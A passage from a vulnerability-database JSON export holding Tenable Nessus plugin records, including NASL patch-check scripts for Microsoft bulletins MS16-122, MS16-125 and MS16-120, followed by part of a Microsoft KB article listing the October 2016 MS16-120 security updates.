"AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"}, "published": "2016-10-12T00:00:00", "title": "MS16-122: Security Update for Microsoft Video Control (3195360)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2016-0142"], "modified": "2021-01-02T00:00:00", "cpe": ["cpe:/o:microsoft:windows"], "id": "SMB_NT_MS16-122.NASL", "href": "https://www.tenable.com/plugins/nessus/94014", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(94014);\n script_version(\"1.8\");\n script_cvs_date(\"Date: 2018/11/15 20:50:32\");\n\n script_cve_id(\"CVE-2016-0142\");\n script_bugtraq_id(93378);\n script_xref(name:\"MSFT\", value:\"MS16-122\");\n script_xref(name:\"IAVA\", value:\"2016-A-0281\");\n script_xref(name:\"MSKB\", value:\"3185330\");\n script_xref(name:\"MSKB\", value:\"3185331\");\n script_xref(name:\"MSKB\", value:\"3190847\");\n script_xref(name:\"MSKB\", value:\"3192391\");\n script_xref(name:\"MSKB\", value:\"3192392\");\n script_xref(name:\"MSKB\", value:\"3192440\");\n script_xref(name:\"MSKB\", value:\"3192441\");\n script_xref(name:\"MSKB\", value:\"3194798\");\n\n script_name(english:\"MS16-122: Security Update for Microsoft Video Control (3195360)\");\n script_summary(english:\"Checks the version of msvidctl.dll.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote host is affected by a remote code execution vulnerability.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows host is missing a security update. It is,\ntherefore, affected by a remote code execution vulnerability in\nMicrosoft Video Control due to improper handling of objects in memory.\nAn unauthenticated, remote attacker can exploit this vulnerability\nby convincing a user to visit a specially crafted website or open a\nspecially crafted file, resulting in the execution of arbitrary code\nin the context of the current user.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://docs.microsoft.com/en-us/security-updates/SecurityBulletins/2016/ms16-122\");\n script_set_attribute(attribute:\"solution\", value:\n\"Microsoft has released a set of patches for Windows Vista, 7, 8.1,\nRT 8.1, and 10.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2016/10/11\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2016/10/11\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2016/10/12\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_set_attribute(attribute:\"stig_severity\", value:\"II\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2016-2018 Tenable Network Security, Inc.\");\n\n script_dependencies(\"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\", \"smb_check_rollup.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"smb_hotfixes_fcheck.inc\");\ninclude(\"smb_hotfixes.inc\");\ninclude(\"smb_func.inc\");\ninclude(\"smb_reg_query.inc\");\ninclude(\"misc_func.inc\");\n\nget_kb_item_or_exit(\"SMB/MS_Bulletin_Checks/Possible\");\n\nbulletin = 'MS16-122';\nkbs = make_list(\n '3185330',\n '3185331',\n '3190847',\n '3192391',\n '3192392',\n '3192440',\n '3192441',\n '3194798'\n);\n\nif (get_kb_item(\"Host/patch_management_checks\")) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit(\"SMB/Registry/Enumerated\");\nget_kb_item_or_exit(\"SMB/WindowsVersion\", exit_code:1);\n\nif (hotfix_check_server_core() == 1) audit(AUDIT_WIN_SERVER_CORE);\n\nif (hotfix_check_sp_range(vista:'2', win7:'1', win8:'0', win81:'0', win10:'0') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\n\n# Windows 8 EOL\nproductname = get_kb_item_or_exit(\"SMB/ProductName\", exit_code:1);\nif (\"Windows 8\" >< productname && \"8.1\" >!< productname) audit(AUDIT_OS_SP_NOT_VULN);\n\nif (\"Server 2008\" >< productname || \"Server 2012\" >< productname || \"Server 2016\" >< productname) audit(AUDIT_OS_SP_NOT_VULN);\n\nshare = hotfix_get_systemdrive(as_share:TRUE, exit_on_fail:TRUE);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\nif (\n # Windows 8.1 SP0\n smb_check_rollup(os:\"6.3\",\n sp:0,\n rollup_date: \"10_2016\",\n bulletin:bulletin,\n rollup_kb_list:make_list(3185331, 3192392)) ||\n\n # Windows 7 SP1\n smb_check_rollup(os:\"6.1\",\n sp:1,\n rollup_date: \"10_2016\",\n bulletin:bulletin,\n rollup_kb_list:make_list(3185330, 3192391)) ||\n # Windows Vista\n hotfix_is_vulnerable(os:\"6.0\", sp:2, file:\"msvidctl.dll\", version:\"6.5.6002.24014\", min_version:\"6.5.6002.23000\", dir:\"\\system32\", bulletin:bulletin, kb:\"3190847\") ||\n hotfix_is_vulnerable(os:\"6.0\", sp:2, file:\"msvidctl.dll\", version:\"6.5.6002.19689\", min_version:\"6.5.6002.18000\", dir:\"\\system32\", bulletin:bulletin, kb:\"3190847\") ||\n # Windows 10 (1507)\n smb_check_rollup(os:\"10\",\n sp:0,\n os_build:\"10240\",\n rollup_date: \"10_2016\",\n bulletin:bulletin,\n rollup_kb_list:make_list(3192440)) ||\n # Windows 10 (1511)\n smb_check_rollup(os:\"10\",\n sp:0,\n os_build:\"10586\",\n rollup_date: \"10_2016\",\n bulletin:bulletin,\n rollup_kb_list:make_list(3192441)) ||\n # Windows 10 (1607)\n smb_check_rollup(os:\"10\",\n sp:0,\n os_build:\"14393\",\n rollup_date: \"10_2016\",\n bulletin:bulletin,\n rollup_kb_list:make_list(3194798))\n)\n{\n set_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-01T05:43:53", "description": "The remote Windows host is missing a security update. It is,\ntherefore, affected by an elevation of privilege vulnerability in the\nWindows Diagnostics Hub Standard Collector service due to improper\nsanitization of user-supplied input. A local attacker can exploit\nthis, via a specially crafted application, to execute arbitrary code\nwith elevated system privileges.", "edition": 31, "cvss3": {"score": 7.8, "vector": "AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"}, "published": "2016-10-12T00:00:00", "title": "MS16-125: Security Update for Windows Diagnostic Hub (3193229)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2016-7188"], "modified": "2021-01-02T00:00:00", "cpe": ["cpe:/o:microsoft:windows"], "id": "SMB_NT_MS16-125.NASL", "href": "https://www.tenable.com/plugins/nessus/94008", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(94008);\n script_version(\"1.8\");\n script_cvs_date(\"Date: 2018/11/15 20:50:32\");\n\n script_cve_id(\"CVE-2016-7188\");\n script_bugtraq_id(93359);\n script_xref(name:\"MSFT\", value:\"MS16-125\");\n script_xref(name:\"MSKB\", value:\"3192440\");\n script_xref(name:\"MSKB\", value:\"3192441\");\n script_xref(name:\"MSKB\", value:\"3194798\");\n script_xref(name:\"IAVB\", value:\"2016-B-0151\");\n\n script_name(english:\"MS16-125: Security Update for Windows Diagnostic Hub (3193229)\");\n script_summary(english:\"Checks for the October 2016 Rollup.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is affected by an elevation of privilege\nvulnerability.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows host is missing a security update. It is,\ntherefore, affected by an elevation of privilege vulnerability in the\nWindows Diagnostics Hub Standard Collector service due to improper\nsanitization of user-supplied input. A local attacker can exploit\nthis, via a specially crafted application, to execute arbitrary code\nwith elevated system privileges.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://docs.microsoft.com/en-us/security-updates/SecurityBulletins/2016/ms16-125\");\n script_set_attribute(attribute:\"solution\", value:\n\"Microsoft has released a set of patches for Windows 10.\");\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2016/10/11\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2016/10/11\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2016/10/12\");\n\n script_set_attribute(attribute:\"plugin_type\",value:\"local\");\n script_set_attribute(attribute:\"cpe\",value:\"cpe:/o:microsoft:windows\");\n script_set_attribute(attribute:\"stig_severity\", value:\"II\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2016-2018 Tenable Network Security, Inc.\");\n\n script_dependencies(\"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\", \"smb_check_rollup.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"smb_func.inc\");\ninclude(\"smb_hotfixes.inc\");\ninclude(\"smb_hotfixes_fcheck.inc\");\ninclude(\"misc_func.inc\");\n\nget_kb_item_or_exit(\"SMB/MS_Bulletin_Checks/Possible\");\n\nbulletin = 'MS16-125';\nkbs = make_list(\"3192440\", \"3192441\", \"3194798\");\n\nif (get_kb_item(\"Host/patch_management_checks\"))\n hotfix_check_3rd_party(bulletin:\"MS16-125\", kbs:kbs, severity:SECURITY_HOLE);\n\nif (hotfix_check_sp_range(win10:'0') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\n\nget_kb_item_or_exit(\"SMB/Registry/Enumerated\");\nget_kb_item_or_exit(\"SMB/WindowsVersion\", exit_code:1);\n\nproductname = get_kb_item_or_exit(\"SMB/ProductName\", exit_code:1);\nif (\"Windows 10\" >!< productname) audit(AUDIT_OS_SP_NOT_VULN);\n\nif (\n # 10 threshold 3 (aka 1607)\n smb_check_rollup(os:\"10\",\n sp:0,\n os_build:\"14393\",\n rollup_date: \"10_2016\",\n bulletin:bulletin,\n rollup_kb_list:make_list(3194798)) ||\n # 10 threshold 2 (aka 1511)\n smb_check_rollup(os:\"10\",\n sp:0,\n os_build:\"10586\",\n rollup_date: \"10_2016\",\n bulletin:bulletin,\n rollup_kb_list:make_list(3192441)) ||\n # 10 RTM\n smb_check_rollup(os:\"10\",\n sp:0,\n os_build:\"10240\",\n rollup_date: \"10_2016\",\n bulletin:bulletin,\n rollup_kb_list:make_list(3192440))\n)\n{\n set_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_hole();\n exit(0);\n}\nelse\n{\n audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-01T03:40:16", "description": "The version of Microsoft Silverlight installed on the remote macOS or\nMac OS X host is affected by an information disclosure vulnerability\nin the Graphics Device Interface (GDI) component due to improper\nhandling of objects in memory. A local attacker can exploit this\nvulnerability, via a specially crafted application, to predict memory\noffsets in a call stack and bypass the Address Space Layout\nRandomization (ASLR) feature, resulting in the disclosure of memory\ncontents.", "edition": 31, "cvss3": {"score": 5.5, "vector": "AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N"}, "published": "2016-10-12T00:00:00", "title": "MS16-120: Security Update for Microsoft Graphics Component (3192884) (macOS)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2016-3209"], "modified": "2021-01-02T00:00:00", "cpe": ["cpe:/a:microsoft:silverlight"], "id": "MACOSX_MS16-120.NASL", "href": "https://www.tenable.com/plugins/nessus/94010", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(94010);\n script_version(\"1.9\");\n script_cvs_date(\"Date: 2019/11/14\");\n\n script_cve_id(\"CVE-2016-3209\");\n script_bugtraq_id(93385);\n script_xref(name:\"MSFT\", value:\"MS16-120\");\n script_xref(name:\"IAVA\", value:\"2016-A-0278\");\n script_xref(name:\"MSKB\", value:\"3193713\");\n\n script_name(english:\"MS16-120: Security Update for Microsoft Graphics Component (3192884) (macOS)\");\n script_summary(english:\"Checks the version of Microsoft Silverlight.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"A multimedia application framework installed on the remote macOS or\nMac OS X host is affected by an information disclosure vulnerability.\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of Microsoft Silverlight installed on the remote macOS or\nMac OS X host is affected by an information disclosure vulnerability\nin the Graphics Device Interface (GDI) component due to improper\nhandling of objects in memory. A local attacker can exploit this\nvulnerability, via a specially crafted application, to predict memory\noffsets in a call stack and bypass the Address Space Layout\nRandomization (ASLR) feature, resulting in the disclosure of memory\ncontents.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://technet.microsoft.com/library/security/MS16-120\");\n script_set_attribute(attribute:\"solution\", value:\n\"Microsoft has released a set of patches for Silverlight 5.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:N/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2016-3209\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2016/10/11\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2016/10/11\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2016/10/12\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:microsoft:silverlight\");\n script_set_attribute(attribute:\"stig_severity\", value:\"II\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"MacOS X Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2016-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"macosx_silverlight_installed.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/MacOSX/Version\", \"MacOSX/Silverlight/Installed\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\n\nkb_base = \"MacOSX/Silverlight\";\nget_kb_item_or_exit(kb_base+\"/Installed\");\npath = get_kb_item_or_exit(kb_base+\"/Path\", exit_code:1);\nversion = get_kb_item_or_exit(kb_base+\"/Version\", exit_code:1);\n\n\nbulletin = \"MS16-120\";\nkb = \"3193713\";\n\nfixed_version = \"5.1.50901.0\";\nif (version =~ \"^5\\.\" && ver_compare(ver:version, fix:fixed_version, strict:FALSE) < 0)\n{\n if (defined_func(\"report_xml_tag\")) report_xml_tag(tag:bulletin, value:kb);\n\n report =\n '\\n Path : ' + path +\n '\\n Installed version : ' + version +\n '\\n Fixed version : ' + fixed_version +\n '\\n';\n security_report_v4(port:0, severity:SECURITY_WARNING, extra:report);\n}\nelse audit(AUDIT_INST_VER_NOT_VULN, \"Microsoft Silverlight\", version);\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}], "mskb": [{"lastseen": "2021-01-01T22:40:48", "bulletinFamily": "microsoft", "cvelist": ["CVE-2016-3209", "CVE-2016-3396", "CVE-2016-3263", "CVE-2016-3393", "CVE-2016-7182", "CVE-2016-3270", "CVE-2016-3262"], "description": "<html><body><p>Resolves vulnerabilities in Microsoft Windows, Microsoft Office, Skype for Business, Silverlight, Microsoft Lync, and in the Microsoft .NET Framework that could allow remote code execution if a user either visits a specially crafted website or opens a specially crafted document. This update addresses the vulnerabilities by correcting how the Windows font library handles embedded fonts.</p><h2>Summary</h2><div class=\"kb-summary-section section\">This update resolves vulnerabilities in Microsoft Windows, Microsoft Office, Skype for Business, Silverlight, Microsoft Lync, and the Microsoft .NET Framework. The vulnerabilities could allow remote code execution if a user either visits a specially crafted website or opens a specially crafted document. This update addresses the vulnerabilities by correcting how the Windows font library handles embedded fonts. To learn more about the vulnerability, see <a href=\"https://technet.microsoft.com/library/security/ms16-120\" id=\"kb-link-2\" target=\"_self\">Microsoft Security Bulletin MS16-120</a>.<br/><span></span></div><h2>More Information</h2><div class=\"kb-moreinformation-section section\"><span class=\"text-base\">Important</span><ul class=\"sbody-free_list\"><li>All future security and nonsecurity updates for Windows RT 8.1, Windows 8.1, and Windows Server 2012 R2 require update <a href=\"https://support.microsoft.com/en-us/help/2919355\" id=\"kb-link-3\">2919355 </a> to be installed. We recommend that you install update <a href=\"https://support.microsoft.com/en-us/help/2919355\" id=\"kb-link-4\">2919355 </a> on your Windows RT 8.1-based, Windows 8.1-based, or Windows Server 2012 R2-based computer so that you receive future updates. </li><li>If you install a language pack after you install this update, you must reinstall this update. Therefore, we recommend that you install any language packs that you need before you install this update. For more information, see <a href=\"https://technet.microsoft.com/en-us/library/hh825699\" id=\"kb-link-5\" target=\"_self\">Add language packs to Windows</a>.<br/></li></ul></div><h2>Additional information about this security update</h2><div class=\"kb-moreinformation-section section\"><br/>The following articles contain additional information about this security update as it relates to individual product versions. The articles may contain known issue information.<br/><ul class=\"sbody-free_list\"><li><a href=\"https://support.microsoft.com/help/3189040\" id=\"kb-link-6\" target=\"_self\">3189040</a> MS16-120: Description of the security update for the .NET Framework 4.6 for Windows Vista Service Pack 2 and Windows Server 2008 Service Pack 2: October 11, 2016: October 11, 2016</li><li><a href=\"https://support.microsoft.com/help/3189039\" id=\"kb-link-7\" target=\"_self\">3189039</a> MS16-120: Description of the security update for the .NET Framework 4.5.2 for Windows Vista Service Pack 2 and Windows Server 2008 Service Pack 2: October 11, 2016</li><li><a href=\"https://support.microsoft.com/help/3188730\" id=\"kb-link-8\" target=\"_self\">3188730</a> MS16-120: Description of the security update for the .NET Framework 3.5.1 for Windows 7 and Windows Server 2008 R2 Service Pack 1: October 11, 2016</li><li><a href=\"https://support.microsoft.com/help/3188731\" id=\"kb-link-9\" target=\"_self\">3188731</a> MS16-120: Description of the security update for the .NET Framework 3.5 for Windows Server 2012: October 11, 2016</li><li><a href=\"https://support.microsoft.com/help/3188732\" id=\"kb-link-10\" target=\"_self\">3188732</a> MS16-120: Description of the security update for the .NET Framework 3.5 for Windows 8.1, Windows RT 8.1, and Windows Server 2012 R2: October 11, 2016</li><li><a href=\"https://support.microsoft.com/help/3188726\" id=\"kb-link-11\" target=\"_self\">3188726</a> MS16-120: Description of the security update for the .NET Framework 3.0 Service Pack 2 for Windows Vista Service Pack 2 and Windows Server 2008 Service Pack 2: October 11, 2016</li><li><a href=\"https://support.microsoft.com/help/3188735\" id=\"kb-link-12\" target=\"_self\">3188735</a> MS16-120: Description of the security update for the .NET Framework 3.0 Service Pack 2 for Windows Vista Service Pack 2 and Windows Server 2008 Service Pack 2: October 11, 2016</li><li><a href=\"https://support.microsoft.com/help/3189052\" id=\"kb-link-13\" target=\"_self\">3189052</a> MS16-120: Description of the Security and Quality Rollup for the .NET Framework 4.6 for Windows Vista Service Pack 2 and Windows Server 2008 Service Pack 2: October 11, 2016</li><li><a href=\"https://support.microsoft.com/help/3189051\" id=\"kb-link-14\" target=\"_self\">3189051</a> MS16-120: Description of the Security and Quality Rollup for the .NET Framework 4.5.2 for Windows Vista Service Pack 2 and Windows Server 2008 Service Pack 2: October 11, 2016</li><li><a href=\"https://support.microsoft.com/help/3188740\" id=\"kb-link-15\" target=\"_self\">3188740</a> MS16-120: Description of the Security and Quality Rollup for the .NET Framework 3.5.1 for Windows 7 Service Pack 1 and Windows Server 2008 R2 Service Pack 1: October 11, 2016</li><li><a href=\"https://support.microsoft.com/help/3188741\" id=\"kb-link-16\" target=\"_self\">3188741</a> MS16-120: Description of the Security and Quality Rollup for the .NET Framework 3.5 for Windows Server 2012: October 11, 2016</li><li><a href=\"https://support.microsoft.com/help/3188743\" id=\"kb-link-17\" target=\"_self\">3188743</a> MS16-120: Description of the Security and Quality Rollup for the .NET Framework 3.5 for Windows 8.1 and Windows Server 2012 R2: October 11, 2016</li><li><a href=\"https://support.microsoft.com/help/3193713\" id=\"kb-link-18\" target=\"_self\">3193713</a>\u00a0MS16-120: Security update for Silverlight: October 11, 2016</li><li><a href=\"https://support.microsoft.com/help/3188744\" id=\"kb-link-19\" target=\"_self\">3188744</a> MS16-120: Description of the Security and Quality Rollup for the .NET Framework 3.0 Service Pack 2, 4.5.2, and 4.6 for Windows Vista and Windows Server 2008: October 11, 2016</li><li><a href=\"https://support.microsoft.com/help/3118301\" id=\"kb-link-20\" target=\"_self\">3118301</a> MS16-120: Description of the security update for 2007 Microsoft Office Suite: October 11, 2016</li><li><a href=\"https://support.microsoft.com/help/3118317\" id=\"kb-link-21\" target=\"_self\">3118317</a> MS16-120: Description of the security update for Office 2010: October 11, 2016</li><li><a href=\"https://support.microsoft.com/help/3118394\" id=\"kb-link-22\" target=\"_self\">3118394</a> MS16-120: Description of the security update for Word Viewer: October 11, 2016</li><li><a href=\"https://support.microsoft.com/help/3118327\" id=\"kb-link-23\" target=\"_self\">3118327</a> MS16-120: Description of the security update for Skype for Business 2016: October 11, 2016</li><li><a href=\"https://support.microsoft.com/help/3118348\" id=\"kb-link-24\" target=\"_self\">3118348</a> MS16-120: Description of the security update for Lync 2013 (Skype for Business): October 11, 2016</li><li><a href=\"https://support.microsoft.com/help/3188397\" id=\"kb-link-25\" target=\"_self\">3188397</a> MS16-120: Description of the security update for Lync 2010: October 11, 2016</li><li><a href=\"https://support.microsoft.com/help/3188399\" id=\"kb-link-26\" target=\"_self\">3188399</a> MS16-120: Description of the security update for Lync 2010 Attendee (user level install): October 11, 2016</li><li><a href=\"https://support.microsoft.com/help/3188400\" id=\"kb-link-27\" target=\"_self\">3188400</a>\u00a0MS16-120: Description of the security update for Lync 2010 Attendee (admin level install): October 11, 2016</li><li><a href=\"https://support.microsoft.com/help/3189647\" id=\"kb-link-28\" target=\"_self\">3189647</a> MS16-120: Description of the security update for Live Meeting Console: October 11, 2016</li><li><a href=\"https://support.microsoft.com/help/3189648\" id=\"kb-link-29\" target=\"_self\">3189648</a> MS16-120: Description of the OCS Conferencing Addin for Outlook: October 11, 2016</li><li><a href=\"https://support.microsoft.com/help/3188736\" id=\"kb-link-30\" target=\"_self\">3188736</a>\u00a0MS16-120: Description of the Security and Quality Rollup .NET Framework 3.0 Service Pack 2, 4.5.2, and 4.6 updates for Windows Vista Service Pack 2 and Windows Server 2008 Service Pack 2: October 11, 2016 </li><li><a href=\"https://support.microsoft.com/help/3191203\" id=\"kb-link-31\" target=\"_self\">3191203</a> MS16-120 and MS16-123: Description of the security update for kernel-mode drivers: October 11, 2016</li><li><a href=\"https://support.microsoft.com/help/3192392\" id=\"kb-link-32\" target=\"_self\">3192392</a>\u00a0October 2016 security only quality update for Windows 8.1 and Windows Server 2012 R2</li><li><a href=\"https://support.microsoft.com/help/3185331\" id=\"kb-link-33\" target=\"_self\">3185331</a>\u00a0October 2016 security monthly quality rollup for Windows 8.1 and Windows Server 2012 R2</li><li><a href=\"https://support.microsoft.com/help/3192393\" id=\"kb-link-34\" target=\"_self\">3192393</a> October 2016 security only quality update for Windows Server 2012</li><li><a href=\"https://support.microsoft.com/help/3185332\" id=\"kb-link-35\" target=\"_self\">3185332</a> October 2016 security monthly quality rollup for Windows Server 2012</li><li><a href=\"https://support.microsoft.com/help/3192391\" id=\"kb-link-36\" target=\"_self\">3192391</a> October 2016 security only quality update for Windows 7 SP1 and Windows Server 2008 R2 SP1</li><li><a href=\"https://support.microsoft.com/help/3185330\" id=\"kb-link-37\" target=\"_self\">3185330</a> October 2016 security monthly quality rollup for Windows 7 SP1 and Windows Server 2008 R2 SP1</li><li><a href=\"https://support.microsoft.com/help/3192440\" id=\"kb-link-38\" target=\"_self\">3192440</a> Cumulative update for Windows 10: October 11, 2016</li><li><a href=\"https://support.microsoft.com/help/3194798\" id=\"kb-link-39\" target=\"_self\">3194798</a>\u00a0Cumulative update for Windows 10 Version 1607\u00a0and Windows Server 2016: October 11, 2016</li><li><a href=\"https://support.microsoft.com/help/3192441\" id=\"kb-link-40\" target=\"_self\">3192441</a> Cumulative update for Windows 10 Version 1511: October 11, 2016</li></ul></div><h2></h2><div class=\"kb-moreinformation-section section\"><div class=\"faq-section\" faq-section=\"\"><div class=\"faq-panel\"><div class=\"faq-panel-heading\" faq-panel-heading=\"\"><span class=\"link-expand-image\"><span class=\"faq-chevron win-icon win-icon-ChevronUpSmall\"></span></span><span class=\"bold btn-link link-expand-text\"><span class=\"bold btn-link\">Security update deployment information</span></span></div><div class=\"faq-panel-body\" faq-panel-body=\"\"><span><div class=\"kb-collapsible kb-collapsible-collapsed\"><h4 class=\"sbody-h4\"> Windows Vista (excluding .NET)</h4><span class=\"text-base\">Reference table</span><br/><br/>The following table contains the security update information for this software.<br/><div class=\"table-responsive\"><table class=\"sbody-table table\"><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Security update file names</span></td><td class=\"sbody-td\">For all supported 32-bit editions of Windows Vista:<br/><span class=\"text-base\">Windows6.0-KB3191203-x86.msu</span></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td><td class=\"sbody-td\">For all supported x64-based editions of Windows Vista:<br/><span class=\"text-base\">Windows6.0-KB3191203-x64.msu</span></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Installation switches</span></td><td class=\"sbody-td\">For Microsoft Windows, see <a href=\"https://support.microsoft.com/help/934307\" id=\"kb-link-42\" target=\"_self\">Microsoft Knowledge Base article 934307</a></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td><td class=\"sbody-td\">For Microsoft .NET Framework, see <a href=\"https://support.microsoft.com/help/2844699\" id=\"kb-link-43\" target=\"_self\">Microsoft Knowledge Base article 2844699</a></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Update log file</span></td><td class=\"sbody-td\">Not applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Restart requirement</span></td><td class=\"sbody-td\">Yes, you must restart your system after you apply this security update. </td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Removal information</span></td><td class=\"sbody-td\">WUSA.exe does not support uninstalling updates. To uninstall an update that is installed by WUSA, click <strong class=\"uiterm\">Control Panel</strong>, and then click <strong class=\"uiterm\">Security</strong>. Under <span class=\"sbody-userinput\">Windows Update</span>, click <strong class=\"uiterm\">View installed updates</strong>, and then select from the list of updates. </td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File information</span></td><td class=\"sbody-td\">See <a href=\"https://support.microsoft.com/help/3191203\" id=\"kb-link-44\" target=\"_self\">Microsoft Knowledge Base article 3191203</a></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Registry key verification</span></td><td class=\"sbody-td\">This update does not add a registry key to validate its installation. </td></tr></table></div><h4 class=\"sbody-h4\"> Windows Server 2008 (excluding .NET)</h4><span class=\"text-base\">Reference table</span><br/><br/>The following table contains the security update information for this software.<br/><div class=\"table-responsive\"><table class=\"sbody-table table\"><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Security update file names</span></td><td class=\"sbody-td\">For all supported 32-bit editions of Windows Server 2008:<br/><span class=\"text-base\">Windows6.0-KB3191203-x86.msu</span></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td><td class=\"sbody-td\">For all supported x64-based editions of Windows Server 2008:<br/><span class=\"text-base\">Windows6.0-KB3191203-x64.msu</span></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td><td class=\"sbody-td\">For all supported Itanium-based editions of Windows Server 2008:<br/><span class=\"text-base\">Windows6.0-KB3191203-ia64.msu</span></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Installation switches</span></td><td class=\"sbody-td\">For 